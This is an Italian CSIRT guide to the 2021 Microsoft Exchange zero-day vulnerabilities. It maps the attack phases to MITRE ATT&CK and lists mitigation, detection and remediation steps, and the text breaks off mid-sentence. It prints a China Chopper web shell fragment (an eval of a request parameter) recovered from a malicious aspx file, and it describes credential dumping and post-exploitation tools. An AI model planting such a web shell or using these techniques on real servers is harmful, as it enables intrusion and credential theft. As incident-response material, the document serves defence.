Incidente Microsoft Exchange - Guida alle vulnerabilità e misure di mitigazione - Versione 2.0 - marzo 2021 - Csirt
←
→
Trascrizione del contenuto della pagina
Se il tuo browser non visualizza correttamente la pagina, ti preghiamo di leggere il contenuto della pagina quaggiù
Incidente Microsoft Exchange
Guida alle vulnerabilità e misure di mitigazione
Versione 2.0 – marzo 2021
Sommario
1. INTRODUZIONE ........................................................................................................................................... 3
1.1. Timeline ..................................................................................................................................................... 3
1.2. Descrizione delle vulnerabilità.................................................................................................................. 4
1.3. Descrizione delle possibili fasi di sfruttamento delle vulnerabilità. ....................................................... 4
1.3.1. Ricognizione (T1592.002 Gather Victim Host Information: Software) ................................................ 4
1.3.2. Preparazione risorse (T1583 Acquire Infrastructure / T1588 Obtain Capabilities) ............................. 4
1.3.3. Accesso iniziale (TA001 Initial Access / T1190 Exploit Public-Facing Application).............................. 4
1.3.4. Esecuzione (TA002 Execution / T1059 Command and Scripting Interpreter / T1047 Windows
Management Instrumentation / T1559 Inter-Process Communication)............................................................. 5
1.3.5. Persistenza (TA003 Persistence) ........................................................................................................... 5
1.3.6. Evasione delle difese (TA005 Defence Evasion) ................................................................................... 6
1.3.7. Accesso alle credenziali (TA006 Credential Access) ............................................................................. 6
1.3.8. Movimento laterale (TA008 Lateral Movement) ................................................................................. 6
1.3.9. Raccolta (TA0009 Collection) ................................................................................................................ 6
1.3.10. Comando e Controllo (TA0011 Command and Control) ...................................................................... 6
1.3.11. Esfiltrazione (TA0010 Exfiltration) ........................................................................................................ 6
1.3.12. Impatto (TA0040 Impact) ...................................................................................................................... 7
2. MITIGAZIONI ................................................................................................................................................ 8
2.1. Interim ....................................................................................................................................................... 9
2.2. Microsoft Safety Scanner ........................................................................................................................ 10
2.3. Patch ........................................................................................................................................................ 11
3. ULTERIORI ATTIVITÀ DI RILEVAMENTO MITIGAZIONE E REMEDIATION ................................................... 12
3.1. Detection ed eventuale contenimento................................................................................................... 12
3.2. Possibili attività di Mitigation ................................................................................................................. 14
FONTI E RIFERIMENTI ....................................................................................................................................... 16
2 di 161. INTRODUZIONE
A seguito della pubblicazione da parte di Microsoft di quattro vulnerabilità 0-day impattanti le infrastrutture
Exchange on-premises sono state avviate le attività di analisi relative alle contromisure da attuare per
prevenire il possibile sfruttamento delle stesse, affiancate dalle attività di verifica e di risposta da parte dei
soggetti utilizzatori della suddetta tecnologia.
Nei successivi paragrafi verranno approfondite le risultanze delle analisi, fornendo, ove possibile, indicazioni
delle misure di rilevamento, mitigazione ed eradicazione consigliate.
Tenuto conto della severità delle vulnerabilità trattate, si consiglia di procedere, con ogni possibile urgenza,
all’applicazione delle mitigazioni suggerite nella sezione “Mitigazioni”, facendo sempre riferimento, per
l’esecuzione delle stesse, alla rispettiva documentazione ufficiale rilasciata dal vendor. La stessa viene
costantemente aggiornata (sia in termini di possibilità di rilevamento sia in termini di semplificazione delle
attività di remediation) con l’evolversi della situazione.
1.1. Timeline
In figura 1 viene riassunta la linea temporale degli eventi, riportando i punti salienti delle principali
comunicazioni effettuate.
Figura 1: Timeline degli eventi
Risulta particolarmente importante sottolineare l’esistenza di un periodo di circa tre mesi intercorso tra la
scoperta delle vulnerabilità e la pubblicazione delle prime misure di mitigazione da parte di Microsoft. Durante
questo periodo gli utilizzatori della tecnologia Exchange sono stati esposti ai rischi generati dalla presenza delle
vulnerabilità descritte nel successivo paragrafo.
3 di 161.2. Descrizione delle vulnerabilità
Di seguito vengono descritte le vulnerabilità in esame:
CVE-2021-26855: vulnerabilità di tipo Server-Side Request Forgery (SSRF) che permetterebbe a un
attaccante di mandare richieste http illecite e autenticarsi come server Exchange;
CVE-2021-26857: vulnerabilità di tipo privilege escalation causata da una deserializzazione non sicura
effettuata dal servizio Unified Messaging, che potrebbe permettere, sotto talune condizioni, di eseguire
codice arbitrario con diritti di livello SYSTEM sul server Exchange. Lo sfruttamento, in questo caso,
prescinde dall'esposizione su Internet del servizio Web di Exchange ma richiede i permessi di
amministratore o l’exploit di un’altra vulnerabilità;
CVE-2021-26858 e CVE-2021-27065: vulnerabilità che, dopo l'autenticazione, permetterebbero la
scrittura arbitraria di file su un server Exchange il cui servizio Web sia esposto online. Un attaccante
autenticato sul server (ad esempio sfruttando la CVE-2021-26855 o compromettendo legittime
credenziali di amministratore) potrebbe utilizzare queste falle per scrivere un file in qualunque percorso
del sistema.
La concatenazione delle suddette vulnerabilità offre ad un attaccante differenti strategie con cui
compromettere efficientemente un sistema Exchange esposto su Internet.
1.3. Descrizione delle possibili fasi di sfruttamento delle vulnerabilità.
Le vulnerabilità descritte, affiancate dai tool/PoC1 disponibili a seguito degli aggiornamenti alla prima
comunicazione del vendor, consentono anche ad attaccanti non particolarmente sofisticati di raggiungere i
seguenti macro obiettivi:
compromissione dell’infrastruttura target;
mantenimento della persistenza all’interno delle infrastrutture target anche a seguito dell’installazione
delle patch.
Di seguito vengono descritte, utilizzando la nomenclatura del framework MITRE ATT&CK, alcune tecniche e
tattiche, utilizzabili nello sfruttamento delle vulnerabilità in argomento.
1.3.1. Ricognizione (T1592.002 Gather Victim Host Information: Software)
In questa fase l’attaccante, utilizzando lo script per la verifica della presenza delle vulnerabilità
rilasciato da Microsoft2, è in grado di rilevare la presenza di un possibile target e di conoscere se lo
stesso è o meno vulnerabile.
1.3.2. Preparazione risorse (T1583 Acquire Infrastructure / T1588 Obtain Capabilities)
In questa fase l’attaccante predispone tutte le risorse necessarie alla corretta esecuzione e gestione
dell’attacco. Le attività principali eseguite comportano:
T1583.003 Acquire Infrastructure: Virtual Private Server: acquisizione, compromissione,
noleggio di risorse Internet, quali ad esempio VPS3 e domain hosting, utilizzate anche allo scopo
di ridurre la possibilità di attribuzione in caso di rilevamento da parte del target;
T1588.002 Obtain Capabilities: Tool: collezione e/o sviluppo dei tool necessari con particolare
riferimento ai tool/PoC utilizzati per lo sfruttamento della vulnerabilità. In questo caso la
disponibilità di differenti PoC pubblici4 rende la fase di Weaponization5 accessibile anche ad
attori poco sofisticati.
1.3.3. Accesso iniziale (TA001 Initial Access / T1190 Exploit Public-Facing Application)
1
Proof of Concept
2
Tale script (http-vuln-cve2021-26855.nse) è pubblicamente disponibile al link https://github.com/microsoft/CSS-
Exchange/tree/main/Security ed utilizzabile tramite lo scanner open source Nmap (https://nmap.org/)
3
Virtual Private Server: server virtuali ospitati di norma presso provider di servizi.
4
Il vendor Microsoft con un’azione unilaterale ha rimosso dalla piattaforma github (di cui è proprietaria) i primi PoC
pubblicati ma gli stessi sono stati ulteriormente rilanciati su altre piattaforme quali (tweeter, pastebin, etc).
5
Processo di trasformazione di una vulnerabilità in un exploit funzionante.
4 di 16In questa fase l’attaccante ottiene il primo accesso all’infrastruttura target. Nel caso specifico la
vulnerabilità CVE-2021-26855 è sfruttabile da remoto e non richiede alcun tipo di autenticazione, né
alcuna conoscenza o livello di accesso particolare all’ambiente target. L’attaccante deve solo
conoscere il server che esegue Exchange e l'account da cui desidera esfiltrare la posta elettronica.
Tramite le vulnerabilità CVE-2021-26857, CVE-2021-26858 e CVE-2021-27065, l’attaccante ottiene la
possibilità di eseguire codice arbitrario sui sistemi target. In particolare, la prima vulnerabilità
consente di ottenere permessi di livello SYSTEM e viene sfruttata per trasferire sul sistema colpito gli
strumenti di post-exploitation, ad esempio Webshell, ProcDump, PsExec, Mimikatz, Nishang e
PowerCat, necessari alle successive attività (persistenza, dump dei processi e delle credenziali,
movimento laterale e download di ulteriori artefatti).
1.3.4. Esecuzione (TA002 Execution / T1059 Command and Scripting Interpreter / T1047 Windows
Management Instrumentation / T1559 Inter-Process Communication)
In questa fase, attraverso il livello di privilegi ottenuto (SYSTEM) e degli strumenti caricati durante la
fase precedente, l’attaccante è in grado di esercitare il pieno controllo dei sistemi compromessi
dedicandosi alle attività di esfiltrazione e di movimento laterale, ottenendo la compromissione di
ulteriori sistemi. In particolare, si rileva l’utilizzo di shell di comandi Windows (T1059.003 Command
and Scripting Interpreter: Windows Command Shell) attraverso le Web Shell trasferite durante la
fase precedente.
1.3.5. Persistenza (TA003 Persistence)
L’attaccante, a seguito di eventuali azioni di mitigazione come l’installazione degli aggiornamenti
correttivi delle vulnerabilità utilizzate, la modifica delle credenziali o il semplice riavvio del server,
potrebbe perdere l’accesso al sistema compromesso. In questa fase l’attaccante esegue dunque le
attività necessarie al mantenimento dell’accesso ai sistemi compromessi.
È stato osservato che la persistenza è stata ottenuta tramite:
T1505.003 Server Software Component: Web Shell: Attivazione di Web Shell. Con particolare
riferimento al caso in esame6 è stato rilevato che gli attaccanti hanno utilizzato Web Shell della
famiglia China Chopper. Le stesse si compongono di due parti:
una componente server, contenuta all’interno della pagina aspx ospitata dal server
Exchange vulnerabile;
una componente client, contenuta in un file eseguibile ed ospitata sul sistema
dell’attaccante.
In merito alla componente server è stato possibile recuperare due file, trattati anche dal CISA7,
aventi rispettivamente i seguenti file name e hash MD5:
discover.aspx: ca7df873422d59c358397d3cb44ae6aa
RedirSuiteServerProxy.aspx: ab3963337cf24dc2ade6406f11901e1f
Di seguito si riportano i punti salienti del file discover.aspx:
Chiave Valore
InternalUrl: https://.com/OAB
ExternalUrl: http://f/function
Page_Load(){eval(Request[""],"unsafe");}
ExchangeVersion: 0.10 (14.0.100.0)
WhenCreated: .AM
6
Come riportato da FireEye in un’analisi approfondita disponibile al link: https://www.fireeye.com/blog/threat-
research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
7
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072b
5 di 16La componente malevola del file aspx risiede nel parametro ExternalUrl il quale, sebbene in
uno scenario reale corrisponda8 all’URL utilizzato per accedere dall’esterno alla Virtual
Directory, in questo caso contiene la Web Shell.
T1136.02 Create Account: Domain Account: Creazione di account di dominio dotati di specifici
privilegi necessari a mantenere l’accesso desiderato sui sistemi colpiti.
1.3.6. Evasione delle difese (TA005 Defence Evasion)
In questa fase l’attaccante esegue le attività necessarie a ridurre la possibilità di essere rilevato dai
controlli di sicurezza. Per ottenere questo risultato, nel caso in questione è stato rilevato l’utilizzo
della tecnica T1036 Masquerading: Match Legitimate Name or Location che prevede il
mascheramento degli artefatti malevoli mediante la loro ridenominazione in modo similare o
identico a corrispettivi files legittimi (come log.aspx, logout.aspx, errorPage.aspx, ecc.).
1.3.7. Accesso alle credenziali (TA006 Credential Access)
In questa fase avviene il furto delle credenziali presenti nei sistemi colpiti (T1003 OS Credential
Dumping) ad esempio tramite l’accesso all’archivio locale LSASS (T1003.001 OS Credential Dumping:
LSASS Memory) o l’esfiltrazione del database di Active Directory NTDS.dit9 il quale contiene, oltre
alle informazioni riguardanti gli oggetti di tipo utente, i gruppi, l’appartenenza degli utenti agli stessi,
gli hash delle password (T1003.001 OS Credential Dumping: NTDS).
1.3.8. Movimento laterale (TA008 Lateral Movement)
In questa fase, ottenuto l’accesso a credenziali valide, l’attaccante procede alla compromissione di
ulteriori dispositivi afferenti alla rete compromessa, attraverso ad esempio, l’utilizzo combinato delle
stesse con gli strumenti caricati precedentemente.
1.3.9. Raccolta (TA0009 Collection)
In questa fase l’attaccante raccoglie le informazioni di proprio interesse attraverso ad esempio la
creazione di archivi compressi (T1560 Archive Collected Data) per la seguente fase di esfiltrazione,
effettuabile sfruttando utility di compressione di terze parti come 7-Zip o WinRar, caricate anch’esse
durante la precedente fase di accesso iniziale (T1560.001 - Archive Collected Data: Archive via
Utility). Ulteriore tecnica riscontrata in questo passo è la collezione di e-mail e informazioni dalle
mailbox attraverso, ad esempio, l’utilizzo di snap-in Powershell (T1114.002 - Email Collection:
Remote Email Collection).
1.3.10. Comando e Controllo (TA0011 Command and Control)
Questa attività segue l’attaccante per tutta la durata dell’incidente in quanto comprende tutte le
attività di comunicazione tra l’infrastruttura di controllo messa in opera per l’attività ed i sistemi
compromessi. Lo sfruttamento delle vulnerabilità in esame consente una vasta gamma di possibilità
per le attività di C2 ed in particolare di quelle riferibili all’utilizzo dei protocolli applicativi standard in
modo da ridurre le possibilità di individuazione (T1071 Application Layer Protocol) e, in particolare,
attraverso l’utilizzo di protocolli comunemente associati a traffico web (HTTP/HTTPS) come nel caso
delle Web Shell (T1071.001 Application Layer Protocol: WEB Protocols).
1.3.11. Esfiltrazione (TA0010 Exfiltration)
In questa fase l’attaccante può procedere con le attività di esfiltrazione dalla rete compromessa delle
informazioni raccolte. Dato l’elevato livello di permessi ottenibili tramite le vulnerabilità, questa
8
https://docs.microsoft.com/en-us/powershell/module/exchange/set-oabvirtualdirectory?view=exchange-ps#parameters
9
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-
2003/cc772829(v=ws.10)?redirectedfrom=MSDN
6 di 16attività potrebbe avvenire da un qualsiasi dispositivo appartenente all’ambiente Active Directory
compromesso e attraverso differenti modalità quali ad esempio l’utilizzo di servizi cloud (T1567.002
Exfiltration Over Web Service: Exfiltration to Cloud Storage/T1041 Exfiltration Over C2 Channel).
1.3.12. Impatto (TA0040 Impact)
La presenza di PoC pubblici, permettendo lo sfruttamento delle vulnerabilità anche ad attori poco
sofisticati, potrebbe comportare l’aumento esponenziale degli incidenti legati alle attività di
esfiltrazione, interruzione o distruzione dei sistemi e/o dei dati. In tali situazioni è altamente
probabile l’incremento del rilascio di ransomware a scopo estorsivo10 (T1486 Data Encrypted for
Impact).
10
https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/
7 di 162. MITIGAZIONI
La mitigazione del rischio non può prescindere dall’analisi della propria infrastruttura, al fine di valutare:
la presenza delle vulnerabilità;
la presenza di indicatori di compromissione.
Per quanto concerne la prima attività è possibile rilevare la presenza delle vulnerabilità nella propria
infrastruttura attraverso l’utilizzo di uno script per nmap rilasciato da Microsoft e disponibile pubblicamente
al seguente link:
https://github.com/microsoft/CSS-Exchange/tree/main/Security.
Per la seconda attività, in caso non si disponga della capacità interna di verifica degli indicatori di
compromissione, è possibile utilizzare lo strumento denominato CHIRP (CISA Hunt and Incident Response
Program), rilasciato inizialmente dal CISA11 per permettere di ricercare, all’interno del sistema, gli IoC relativi
ai recenti eventi che hanno coinvolto SolarWinds e ActiveDirectory/M365, aggiungendo allo stesso gli
indicatori relativi alle vulnerabilità in esame rilasciati dal vendor.
Di seguito vengono elencate ulteriori attività che è possibile effettuare nell’immediatezza per la ricerca di
eventuali evidenze di compromissione12:
- analisi delle modifiche afferenti gli utenti ed i gruppi locali, anche non amministrativi, assicurandosi che
tutti necessitino di una password per l'accesso;
- verifica della possibile creazione di nuovi account (rappresentata dall'ID evento 4720) durante il periodo
di esposizione del sistema alle vulnerabilità;
- reset e randomizzazione delle password degli amministratori locali utilizzando uno strumento quale
LAPS13;
- analisi delle eventuali modifiche alla configurazione RDP14, firewall, subscription WMI e Windows Remote
Management (WinRM) del sistema che potrebbero essere state effettuate dall'autore dell'attacco per
garantirsi la persistenza;
- ricerca nei log di sistema dell’evento ID 1102 per determinare se eventuali attaccanti abbiano cancellato
dati dal registro eventi, al fine di coprire le loro tracce;
- ricerca della presenza di nuovi meccanismi di persistenza quali servizi imprevisti, attività pianificate ed
elementi di avvio;
- ricerca di tool non precedentemente presenti sui server che eventuali attaccanti potrebbero aver installato
per garantirsi la persistenza, quali soluzioni RDP non Microsoft e client di accesso remoto;
- verifica delle impostazioni di inoltro della posta elettronica a livello mailbox (attributi ForwardingAddress
e ForwardingSMTPAddress), verifica delle regole di smistamento della posta in arrivo (che potrebbero
essere utilizzate per inoltrare la posta elettronica esternamente) e verifica della presenza di transport-rules
di Exchange non impostate precedentemente.
- isolamento dei server Exchange dalla rete Internet attraverso l’implementazione di regole di firewalling
atte a bloccare l’accesso alla porta 443 esposta dal server. Tale azione comporterà l’impossibilità di
accedere alla propria posta elettronica da parte degli utenti provenienti da Internet. Per mitigare il
disservizio generato si consiglia di configurare ove possibile connessioni VPN attraverso le quali consentire
ai propri utenti l’accesso alla posta elettronica.
11
Cybersecurity and Infrastructure Security Agency
12
https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-
vulnerabilities/
13
https://www.microsoft.com/en-us/download/details.aspx?id=46899
14
Remote Desktop Protocol: sistema di accesso remoto al server.
8 di 16In caso dovesse essere rilevata la presenza di Webshell è consigliato inoltre procedere con le seguenti attività:
- copia forense (ove possibile) del server;
- disconnessione fisica o virtuale (tramite ad esempio regole di firewalling) del server Exchange dalla rete;
- riavvio del server;
- stop del servizio W3WP;
- rimozione di tutti i file aspx malevoli identificati precedentemente;
- rimozione di tutti i file temporanei ASP.NET utilizzando il seguente script rilasciato da Microsoft:
iisreset /stop
$tempAspDir =
"$env:Windir\Microsoft.NET\Framework64\$([System.Runtime.InteropServices.RuntimeEnvironment]::Ge
tSystemVersion())\Temporary ASP.NET Files"
mkdir 'C:\forensicbackup'
Copy-Item -Recurse -Path $tempAspDir -Destination 'C:\forensicbackup'
rm -r -Force $tempAspDir
iisreset /start
È inoltre possibile seguire le modalità di mitigazione indicate dal vendor Microsoft, ad esempio attraverso
l’utilizzo del tool MSERT per la rilevazione e la rimozione di eventuali artefatti malevoli.
In particolare Microsoft ha rilasciato le seguenti modalità di intervento:
mitigazione provvisoria (Interim), pensata per quegli utenti che non dispongono di un’area IT/Security e/o
per quegli utenti che non hanno familiarità coi processi di aggiornamento o non possono provvedere
nell’immediato all’applicazione delle patch di sicurezza;
installazione degli aggiornamenti di sicurezza sul prodotto on-premises;
utilizzo di Microsoft Defender e System Center Endpoint Protection per mitigare temporaneamente la
suddetta vulnerabilità in maniera automatica, senza nessuna interazione da parte dell’utente, che deve,
quindi, assicurarsi di avere gli aggiornamenti automatici attivi e/o di aver installato almeno la build
1.333.747.015.
Si riporta, di seguito, il dettaglio delle soluzioni elencate.
2.1. Interim
Le mitigazioni provvisore, pensate per far fronte immediatamente, seppur in maniera temporanea, alla
vulnerabilità identificata dalla CVE 2021-26855, sono distribuite attraverso alcuni strumenti pubblicati
sull’apposita pagina Github Microsoft:
https://github.com/microsoft/CSS-Exchange/tree/main/Security .
In particolare, lo script che Microsoft raccomanda di eseguire con la massima urgenza denominato EOMT16
(Exchange On-premises Mitigation Tool), contiene una serie di istruzioni PowerShell che svolgono,
sostanzialmente, tre macro operazioni:
implementazione di alcune URL Rewrite in IIS (Internet Information Services);
installazione di Microsoft Safety Scanner e successiva analisi del server Exchange (in modalità quick scan).
Qualora ci fosse il sospetto di una possibile compromissione, lo scanner andrà avviato in modalità full;
tentativo di mitigazione delle potenziali evidenze rilevate dal software.
15
https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-
microsoft-defender-antivirus/
16
https://github.com/microsoft/CSS-Exchange/releases/latest/download/EOMT.ps1
9 di 16Di seguito i requisiti di sistema17 in termini di versioni da soddisfare prima di procedere a questo tipo di
mitigazione:
PowerShell >= 3
IIS >= 7.5
Exchange 2013, Exchange 2016 o Exchange 2019
Windows Server 2008 R2, Server 2012, Server 2012 R2, Server 2016 o Server 2019
Va specificato che questo tipo di soluzione (temporanea) può essere applicata solo se i server Exchange sono
provvisti di connessione Internet e se è possibile eseguire PowerShell con diritti di amministrazione.
2.2. Microsoft Safety Scanner
Microsoft Safety Scanner è uno strumento rilasciato da Microsoft per cercare e rimuovere codice malevolo
(malware) dal computer. Una volta scaricato18 si potrà scegliere se:
effettuare una scansione completa (full scan) la quale, a discapito della quantità di tempo impiegata,
fornisce un’analisi più completa, andando a scansionare tutti i file presenti nel PC;
consultare i risultati della scansione generati in %SYSTEMROOT%\debug\msert.log;
Effettuare una scansione personalizzata (customized scan) al fine di ricercare i file malevoli solo all’interno
delle cartelle tipicamente utilizzate dagli attori malevoli, ovvero:
%IIS installation path%\aspnet_client\*
%IIS installation path%\aspnet_client\system_web\*
%Exchange Server installation path%\FrontEnd\HttpProxy\owa\auth\*
Configured temporary ASP.NET files path
%Exchange Server Installation%\FrontEnd\HttpProxy\ecp\auth\*
Tuttavia Microsoft non ne garantisce l’efficacia per tutte le possibili modalità di attacco poiché l’analisi si basa
sui pattern utilizzati dagli attori malevoli recentemente osservati e per eventuali problemi scaturiti a seguito
dall’utilizzo del tool si rimanda alla pagina ufficiale19.
Per mitigare le quattro vulnerabilità in oggetto, Microsoft ha inizialmente rilasciato il tool denominato
ExchangeMitigation.ps1, la cui esecuzione potrebbe tuttavia causare i disservizi sintetizzati nella seguente
tabella:
Vulnerabilità Mitigazione Disservizi
CVE-2021-26857 Disabilitazione dei servizi di messaggistica Interruzione dei servizi di
unificata (UM Service) messaggistica e di voice mail
CVE-2021-27065 Disabilitazione dell’applicazione Exchange Errore 503 nell’utilizzo di ECP che
Control Panel (ECP) risulterà offline
CVE-2021-26858 Disabilitazione del servizio di rubrica offline Errore 503 nell’utilizzo del servizio
(OAB, Offline Address Book) OAB
L’utilizzo di tale tool è consigliato in caso i server Exchange non abbiano connettività Internet.
17
https://github.com/microsoft/CSS-Exchange/tree/main/Security#system-requirements
18
https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download
19
https://support.microsoft.com/kb/2520970
10 di 162.3. Patch
Le patch ufficiali rilasciate da Microsoft sono, al momento, le uniche soluzioni consigliate dal vendor come
efficaci e durature, e sono suddivise per versione di Exchange. I relativi link alle pagine di aggiornamento sono
riportati di seguito:
Exchange 201020 per il quale è richiesto Service Pack 3;
Exchange 201321 per il quale è richiesto Aggiornamento Cumulativo (Cumulative Update) 23;
Exchange 201622 per il quale è richiesto Aggiornamento Cumulativo (Cumulative Update) 19 o 18;
Exchange 201923 per il quale è richiesto Aggiornamento Cumulativo (Cumulative Update) 8 o 7;
Per gli aggiornamenti cumulativi rilasciati in precedenza è disponibile, invece, l’apposita guida24.
Nel caso in cui si scelga questo tipo di aggiornamento, Microsoft consiglia comunque l’esecuzione dello script
EOMT.ps1 (trattato nella sezione Interim) al fine di ricercare l’esistenza di Indicatori di Compromissione.
20
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-
service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459
21
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-
and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
22
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-
and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
23
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-
and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
24
https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-
cumulative/ba-p/2192020
11 di 163. ULTERIORI ATTIVITÀ DI RILEVAMENTO MITIGAZIONE E REMEDIATION
Data l’elevata possibilità che un attaccante attraverso lo sfruttamento delle vulnerabilità possa
compromettere l’intera infrastruttura Active Directory25 vengono indicate di seguito delle indicazioni di
massima per le attività di rilevamento, contenimento e mitigazione in tali ambienti.
3.1. Detection ed eventuale contenimento
Le attività di detection prevedono il monitoraggio degli indicatori di attività anomala quali:
utilizzo anomalo di credenziali di amministrazione;
autenticazioni effettuate tramite account di personale non presente e/o in orari anomali;
creazione non prevista (dal processo interno di provisioning) di nuovi account;
attività anomala effettuata da account validi (es. tentativi di accesso a risorse non autorizzate e richiesta
di privilegi aggiuntivi non necessari);
rilevamento di eseguibili e/o artefatti malevoli o utilizzabili in maniera malevola (PsExec, Mimikatz, script
Powershell);
impiego di account multipli, privilegiati e non, utilizzati in un tempo ristretto dalla stessa postazione e/o
da postazioni non comunemente utilizzate allo scopo (es. in sedi diverse nello stesso arco temporale);
modifiche di servizi sensibili (es. appartenenza ad un gruppo amministrativo su Active directory);
utilizzo di account differenti per l’accesso perimetrale (es. VPN) e l’utilizzo di risorse interne (se non
previsto).
Il monitoraggio del movimento laterale attraverso la registrazione dei seguenti Windows Event ID:
Event ID 4688: creazione di un nuovo processo, analizzando i campi Account Name e New process Name;
Event ID 4648: tentativo di logon utilizzando credenziali esplicite, analizzando i campi Account Name
(Subject), Account Name (account di cui sono state utilizzate le credenziali), Process Name;
Event ID 4624: un account è stato autenticato con successo, analizzando i campi: Account Name, Logon
type. In particolare il logon type da ricercare è il network logon;
Event ID 4769: richiesta di un ticket di servizio Kerberos, analizzando i campi: Account Name, Service Name,
Client Address;
Event ID 4768: richiesta di un ticket di autenticazione (TGT) Kerberos, analizzando i campi: Account Name,
Service Name, Client Address;
Event ID 4776: il Domain controller ha cercato di validare le credenziali di un account, analizzando i campi:
Logon Account, Source Workstation;
Event ID 100: tentativo di autenticazione NLTM;
Event ID 104: tentativo di utilizzo di DES o RC4 per l’autenticazione Kerberos Authentication;
Event ID 105: l’autenticazione Kerberos da un particolare dispositivo non è permessa;
Event ID 106: l’utente o il device non è autorizzato ad autenticarsi al server;
Event ID 305: la richiesta di un token Kerberos TGT viola le restrizioni;
Event ID 306: l’utente il device od entrambi violano le restrizioni imposte;
Event ID 3065: il controllo di verifica di integrità ha rilevato un driver che non rispetta i requisiti di sicurezza;
Event ID 3066: l’evento rileva che un processo (di solito lssas.exe) ha caricato un driver che non rispetta I
requisiti di firma digitale del software.
25
https://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-
Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf
12 di 16Al riguardo, si coglie l’occasione per far presente che la raccolta dei suddetti eventi dovrebbe essere
centralizzata possibilmente attraverso un’infrastruttura SIEM allo scopo di correlare automaticamente gli
stessi e consentire di individuare le postazioni compromesse per la loro successiva analisi.
L’ individuazione e verifica di tutte le utenze con privilegi elevati ovvero le utenze presenti nei seguenti gruppi
(ed in gruppi custom eventualmente dipendenti):
Enterprise Admins
Domain Admins
Schema Admin
BUILTIN\Administrators
Account Operators
Backup Operators
Print Operators
Server Operators
Domain Controllers
Read-only Domain Controllers
Group Policy Creator Owners
Cryptographic Operators
Distributed COM Users
Gruppi sensibili relativi ad installazioni Exchange on-premises (inclusi Exchange Windows Permissions ed
Exchange Trusted Subsystem)
Ogni utente amministrativo locale utilizzato per attività legate al sistema operativo inclusi i membri del
gruppo amministratori locali;
In caso di anomalia, andrebbe valutata come azione di contenimento la cancellazione delle utenze presenti in
questi gruppi e la loro successiva nuova creazione, in modo da ridurre la possibilità che l’attaccante possa
trovare gli hash delle stesse depositati su postazioni di lavoro ed utilizzarle per scalare i propri privilegi.
L’ individuazione e verifica di tutte le utenze a cui sono stati delegati particolari permessi, nello specifico:
account di servizio utilizzati per l’installazione di software e/o aggiornamenti;
account di servizio utilizzati per eseguire scansioni di sicurezza;
account di servizio utilizzati per eseguire i Backup;
account di servizio utilizzati per il corretto funzionamento dei servizi (es. account di servizio di Sharepoint,
SQL server, Print Servers, File Server, LDAP browsing);
L’individuazione delle postazioni di lavoro e dei server sui quali è necessario utilizzare gli account con privilegi
elevati ad esempio:
server di erogazione dei servizi;
postazioni utilizzate dagli amministratori di dominio e/o dei servizi;
server dedicati agli aggiornamenti di sistema;
server utilizzati per scansioni di sicurezza;
Tutti gli asset di questa tipologia non dovrebbero avere connettività diretta alla rete Internet (ad esempio
attraverso regole di firewalling) e in caso di incidenti, ove possibile, dovrebbero essere reinstallati
completamente.
13 di 163.2. Possibili attività di Mitigation
Le possibili mitigazioni da porre in essere allorquando si dovessero rilevare eventi simili sono le seguenti:
Backup dei sistemi coinvolti su volumi offline con particolare attenzione alle infrastrutture Domain
Controller (ove presenti) effettuando un full backup (https://activedirectorypro.com/backup-active-
directory/)
Aggiornamento delle soluzioni antivirus ed antimalware con particolare attenzione alle componenti
comportamentali degli stessi (ove disponibili);
Implementazione di sistemi di autenticazione multifattore (MFA/2FA) con particolare attenzione ai servizi
esposti sulla rete Internet;
Reset delle credenziali degli utenti a prescindere se le stesse risultino compromesse o meno;
Implementazione di sistemi di verifica della complessità delle password e riduzione dei tempi di durata
delle stesse;
Verifica della propria superficie di esposizione ponendo particolare attenzione ad infrastrutture datate e/o
non più necessarie;
Verifica del proprio processo di patch management e verifica che tutte le infrastrutture gestite siano
aggiornate alle ultime release offerte dal produttore;
Limitazione dell’accesso alla rete Internet delle postazioni di lavoro attraverso l’utilizzo di sistemi di Web
Content Filtering e Web isolation;
Analisi del proprio processo di gestione delle credenziali amministrative e non al fine di identificare
eventuali account non più necessari e/o dormienti.
Applicazione (ove non presente) del modello di segmentazione delle risorse con privilegi amministrativi
secondo quanto previsto dalle best practices Microsoft26 ovvero:
Tier0: Amministratori di foresta. Fanno parte di questo livello tutti gli account e le risorse che
direttamente o indirettamente controllano la Foresta i domini ed i domain controller Active Directory;
Tier1: Amministratori dei servizi. Fanno parte di questo livello tutti gli account che direttamente o
indirettamente controllano server di erogazione di servizi;
Tier2: Amministratori di postazioni di lavoro. Fanno parte di questo livello tutti gli account e le risorse
utilizzate per l’amministrazione delle postazioni di lavoro.
Tutti gli account dovrebbero essere categorizzati all’interno di un livello in modo da realizzare la suddetta
segregazione. In particolare:
Tutti gli account inseriti all’interno di un livello dovrebbero essere utilizzati esclusivamente su postazioni
appartenenti a tale. Dovrebbero essere implementate inoltre ACL (Access Control List) che prevengano
l’errore umano impedendo che le stesse possano essere utilizzate in un differente livello;
Gli utenti che necessitano di accedere a differenti livelli dovrebbero essere dotati di differenti account ed
in particolare per il T0 anche di differenti postazioni di lavoro. Da quest’ultime non dovrà essere possibile
la navigazione su Internet.
Nel caso l’attività di analisi rilevi che la compromissione dell’infrastruttura sia tale da garantire all’attaccante il
